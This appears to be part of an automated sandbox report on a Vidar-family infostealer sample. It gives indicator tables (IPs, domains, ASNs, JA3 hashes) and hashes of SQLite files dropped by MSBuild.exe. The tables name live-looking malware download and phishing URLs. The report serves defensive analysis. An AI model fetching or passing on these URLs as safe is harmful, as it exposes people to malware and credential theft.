                                                                                                                                                                                                                        • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                        14:28:13API Interceptor1x Sleep call for process: MSBuild.exe modified

                                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                                        IPs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        37.27.87.155file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                          qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                              SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  23.76.43.59file.exeGet hashmaliciousLummaC, Glupteba, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, zgRATBrowse
                                                                                                                                                                                                                                  • steamcommunity.com/PhpMyAdmin/

                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  windowsupdatebg.s.llnwi.nethttps://prayas.co/assets/nagateliteqfuk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 69.164.42.0
                                                                                                                                                                                                                                  https://19apmacc8.z13.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 69.164.42.0
                                                                                                                                                                                                                                  https://tronfwo8b.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                                  • 69.164.42.0
                                                                                                                                                                                                                                  https://lindiomargomes.com/khollasa/damit/MTTRBDFH/index.php?FGDD=1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 69.164.42.0
                                                                                                                                                                                                                                  rJlMhHdHP2mDzMGx.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                  • 69.164.42.0
                                                                                                                                                                                                                                  eInvoicing_pdf.vbsGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                  • 69.164.42.0
                                                                                                                                                                                                                                  https://www.we-conect.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 69.164.42.0
                                                                                                                                                                                                                                  http://87.120.84.22Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 69.164.42.0
                                                                                                                                                                                                                                  https://scsang.cn/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 69.164.42.0
                                                                                                                                                                                                                                  https://cvn7.sa.com/invoice.html?app=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 69.164.42.0
                                                                                                                                                                                                                                  fp2e7a.wpc.phicdn.netShippingOrder_ GSHS2400052.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                  • 192.229.211.108
                                                                                                                                                                                                                                  https://prayas.co/assets/nagateliteqfuk.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 192.229.211.108
                                                                                                                                                                                                                                  https://bj8lt4fm8evwyl.pages.dev/smart89/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 192.229.211.108
                                                                                                                                                                                                                                  https://28.104-168-101-28.cprapid.com/Pay-PaI/Get hashmaliciousPayPal PhisherBrowse
                                                                                                                                                                                                                                  • 192.229.211.108
                                                                                                                                                                                                                                  https://jainpokliultachor.pages.dev/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 192.229.211.108
                                                                                                                                                                                                                                  https://sharma-sanjana2108.github.io/Microsoft/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 192.229.211.108
                                                                                                                                                                                                                                  https://pusha1qsn.z13.web.core.windows.net/Get hashmaliciousTechSupportScamBrowse
                                                                                                                                                                                                                                  • 192.229.211.108
                                                                                                                                                                                                                                  https://19apmacc8.z13.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 192.229.211.108
                                                                                                                                                                                                                                  https://eshoradebitcoin.com/3.datGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                  • 192.229.211.108
                                                                                                                                                                                                                                  https://kajdbhfkjahsdifhi.z19.web.core.windows.net/Er0Win8helpline76/index.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 192.229.211.108
                                                                                                                                                                                                                                  steamcommunity.comfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 184.30.122.179
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 104.67.208.180
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 104.67.208.180
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  https://gtm.steamproxy.cc/sharedfiles/shareonsteam/?id=Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 23.210.138.105
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.210.138.105

                                                                                                                                                                                                                                  ASNs

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  UNINETAZfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  4XAsw9FSr5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 37.27.255.7
                                                                                                                                                                                                                                  77system.vbsGet hashmaliciousXmrigBrowse
                                                                                                                                                                                                                                  • 37.27.30.181
                                                                                                                                                                                                                                  aPu2pUmHzL.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 188.227.216.187
                                                                                                                                                                                                                                  xjGg2eC75q.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                  • 37.27.52.220
                                                                                                                                                                                                                                  wsr3iUW0I0.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                  • 37.27.52.220
                                                                                                                                                                                                                                  AMXArgentinaSAARfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  https://url.us.m.mimecastprotect.com/s/kCCtC5yEz0tWp5ANrfz_KPV?domain=paplastics365-my.sharepoint.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 23.76.37.146
                                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  You have a newly assigned document from Frey Navarro P.L.L.C. .msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  • 23.76.45.254
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  sl8houzZt9.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                  • 190.3.66.97
                                                                                                                                                                                                                                  file.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, SmokeLoader, VidarBrowse
                                                                                                                                                                                                                                  • 190.220.21.28

                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  Undetections.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 37.27.87.155
                                                                                                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  Essay on Resolution of Korean Forced Labor Claims.vbsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  SecuriteInfo.com.Win32.Malware-gen.6467.28521.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  z42MNA2024000000041-KWINTMADI-11310Y_K.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  z14Novospedidosdecompra_Profil_4903.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  eOU2MVDmTd.exeGet hashmaliciousCredGrabber, Meduza Stealer, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                  • 23.76.43.59
                                                                                                                                                                                                                                  SecuriteInfo.com.Win64.Malware-gen.14921.4629.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                                                                                                                                  • 23.76.43.59

                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  C:\ProgramData\freebl3.dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                    jNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                      74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                        qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                            SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                  LXoASvZRu1.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                    nXXx6yL69w.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      C:\ProgramData\mozglue.dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                        jNeaezBuo8.exeGet hashmaliciousGlupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                          74fa486WVX.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                                                            qk9TaBBxh8.exeGet hashmaliciousLummaC, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoaderBrowse
                                                                                                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                SecuriteInfo.com.Win64.Evo-gen.32634.31069.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                                                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                    file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                                      LXoASvZRu1.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                                        nXXx6yL69w.exeGet hashmaliciousMars Stealer, Stealc, VidarBrowse

                                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                                          C:\ProgramData\AEBKECFCFBGCAAKEGIJD

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):49152
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8180424350137764
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                                                                                                          MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                                                                                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                                                                                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                                                                                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\AEBKECFCFBGCAAKEGIJDAKKFCG

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):98304
                                                                                                                                                                                                                                                                          Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\AKKFHDAK

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\AKKFHDAKECFHIDHJDAAAEBKJEC

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                                                                                          Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                                          MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                                          SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                                          SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                                          SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\BGHJJDGHCBGDHIECBGID

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\CGCFBFBGHDGDAKECAKJEHCGDAA

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):28672
                                                                                                                                                                                                                                                                          Entropy (8bit):2.5793180405395284
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                                                                                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                                                                                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                                                                                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                                                                                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\DBKKKEHD

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):106496
                                                                                                                                                                                                                                                                          Entropy (8bit):1.1358696453229276
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                                                                                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                                                                                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                                                                                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                                                                                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Reputation:high, very likely benign file
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                          C:\ProgramData\FCBAEHCA

                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):126976
                                                                                                                                                                                                                                                                          Entropy (8bit):0.47147045728725767
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                                                                                                          MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                                                                                                          SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                                                                                                          SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                                                                                                          SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                                                                                                          Malicious:false
